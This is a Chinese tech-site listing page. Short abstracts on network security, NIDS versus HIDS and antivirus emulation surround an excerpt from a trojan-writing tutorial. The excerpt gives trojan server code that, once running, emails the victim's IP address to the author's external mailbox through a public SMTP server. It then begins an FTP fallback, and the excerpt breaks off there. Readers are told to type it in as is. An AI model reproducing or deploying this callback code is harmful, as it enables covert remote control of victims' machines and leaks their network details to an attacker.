摘要:
当企业在找出了可能的威胁来源和可能导致的损害以后,制定适当的安全策略和保护措施就变得比较容易了。企业可以选择多种技术――从杀毒软件包到专用的网络安全硬件(例如防火墙和入侵检测系统),来为网络的所有部分提供保护。 与一个建筑物一样,网络也需要多层保护才能真正安全。 在确定了这种解决方案以后,就可以部署能够周期性地检测网络中的安全漏洞,提供持续、主动的安全保护的工具。另外还需要......
摘要:
与基于主机的ids(host intrusion detection systems,hids)相比,基于网络的ids(network intrusion detection systems,nids)最大的特点在于不需要改变服务器等主机的配置。由于它不需在业务系统的主机中安装额外的软件,不会影响这些机器的cpu、i/o与磁盘等资源的使用,也不会影响业务系统的性能。另外,nids不是系统......
斩草除根—分析木马是如何编写的(三)
上次已编写完服务器端的各种功能,但还差容错部分还未完成,下面我们go on! 其代码如下(照敲不误 ^_^): 【程序编程相关:
C#写的记事本】 【推荐阅读:
EffectiveC#:1.正确区分类集】 【扩展信息:
VisualC#.Net网络程序开发-S】 { end:; socket-〉close(); //关闭服务 serversocket1-〉active =true; //再次打开服务 if (nmsmtp1-〉connected) nmsmtp1-〉disconnect(); //如果smtp服务器已连接则断开 nmsmtp1-〉host = "smtp.163.net"; //选一个好用的smtp服务器,如163.263.sina与btamail nmsmtp1-〉userid = ""; //你smtp的id try { nmsmtp1-〉connect(); //再次连接 } catch(...) { goto nexttime; //跳到nexttime } nmsmtp1-〉postmessage-〉fromaddress ="i dont know!"; //受害者的email地址 nmsmtp1-〉postmessage-〉fromname = "casualty"; //受害者的名字 nmsmtp1-〉postmessage-〉toaddress-〉text = "crossbow@8848.net"; //将信发到我的邮箱,这一步很关键 nmsmtp1-〉postmessage-〉body-〉text = ansistring("server running on:") + nmsmtp1-〉localip ; //信的内容提示你“服务器正在运行”,并且告诉你受害者的目前的ip地址,以便连接 nmsmtp1-〉postmessage-〉subject = "server running now!"; //信的主题 nmsmtp1-〉sendmail(); //发送! return; //返回 nexttime: nmftp1-〉host = "ftp.go.163.com"; //你的ftp服务器的地址 ...
下一页 摘要:
2.虚拟机查毒 2.1虚拟机概论 近些年,虚拟机,在反病毒界也被称为通用解密器,已经成为反病毒软件中最引人注目的部分,尽管反病毒者对于它的运用还远没有达到一个完美的程度,但虚拟机以其诸如"病毒指令码模拟器"和"stryker"等多变的名称为反病毒产品的市场销售带来了光明的前景。以下的讨论将把我们带入一个精彩的虚拟技术的世界中。 首先要谈及的是虚拟机的概念和它与诸如vm......
